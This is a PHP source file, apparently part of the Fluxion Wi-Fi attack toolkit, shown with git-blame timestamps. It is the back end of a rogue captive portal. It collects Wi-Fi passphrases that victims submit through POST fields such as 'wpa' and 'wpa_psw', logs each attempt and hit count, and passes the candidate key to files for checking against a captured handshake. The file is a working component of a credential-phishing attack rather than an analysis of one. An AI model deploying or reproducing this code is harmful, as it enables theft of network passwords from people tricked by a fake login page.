2017-08-15 13:30:04 -06:00
|
|
|
<?php
|
2017-08-16 12:50:03 -06:00
|
|
|
error_reporting(0);
|
|
|
|
|
|
|
|
/*
|
|
|
|
The following represents the authenticator result.
|
|
|
|
By default, we assume the password is incorrect.
|
|
|
|
|
|
|
|
Notice: This variable is used by files including
|
|
|
|
this script, and by the authenticator itself below.
|
|
|
|
*/
|
|
|
|
$candidate_code = 0;
|
|
|
|
|
2017-08-15 13:30:04 -06:00
|
|
|
// Receive get & post data and store to variables
|
2017-08-16 12:05:06 -06:00
|
|
|
$candidateKeyFields = array("password", "password1", "passphrase", "key", "key1", "wpa", "wpa_psw");
|
2017-08-16 12:50:03 -06:00
|
|
|
$matches = array_intersect_key($_POST, array_flip($candidateKeyFields))
|
|
|
|
|
|
|
|
// Retrieve just the first matched value
|
|
|
|
$key = reset($matches);
|
2017-08-15 13:30:04 -06:00
|
|
|
|
2017-08-16 12:50:03 -06:00
|
|
|
// No password was given
|
|
|
|
if(empty($key)) return;
|
2017-08-16 12:05:06 -06:00
|
|
|
|
|
|
|
// Update hit attempts
|
|
|
|
$page_hits_log_path = ("$FLUXIONWorkspacePath/hit.txt");
|
|
|
|
$page_hits = file($page_hits_log_path)[0] + 1;
|
|
|
|
$page_hits_log = fopen($page_hits_log_path, "w");
|
|
|
|
fputs($page_hits_log, $page_hits);
|
|
|
|
fclose($page_hits_log);
|
|
|
|
|
|
|
|
// Prepare candidate and attempt passwords files' locations.
|
|
|
|
$attempt_log_path = "$FLUXIONWorkspacePath/pwdattempt.txt";
|
|
|
|
$candidate_path = "$FLUXIONWorkspacePath/candidate.txt";
|
|
|
|
|
|
|
|
$attempt_log = fopen($attempt_log_path, "w");
|
|
|
|
fwrite($attempt_log, $key);
|
|
|
|
fwrite($attempt_log, "\n");
|
|
|
|
fclose($attempt_log);
|
|
|
|
|
2017-08-16 12:50:03 -06:00
|
|
|
// Write candidate key to file to prep for checking.
|
2017-08-16 12:05:06 -06:00
|
|
|
$candidate = fopen($candidate_path, "w");
|
|
|
|
fwrite($candidate, $key);
|
|
|
|
fwrite($candidate, "\n");
|
|
|
|
fclose($candidate);
|
|
|
|
|
|
|
|
$candidate_result_path = "$FLUXIONWorkspacePath/candidate_result.txt";
|
|
|
|
|
2017-08-16 12:50:03 -06:00
|
|
|
// Create candidate result file to trigger checking.
|
2017-08-16 12:05:06 -06:00
|
|
|
$candidate_result = fopen($candidate_result_path, "w");
|
|
|
|
fwrite($candidate_result,"\n");
|
|
|
|
fclose($candidate_result);
|
|
|
|
|
|
|
|
do {
|
|
|
|
sleep(1);
|
|
|
|
$candidate_code = trim(file_get_contents($candidate_result_path));
|
|
|
|
} while (!ctype_digit($candidate_code));
|
|
|
|
|
2017-08-16 12:50:03 -06:00
|
|
|
// Reset file by deleting it.
|
2017-08-16 12:05:06 -06:00
|
|
|
unlink($candidate_result_path);
|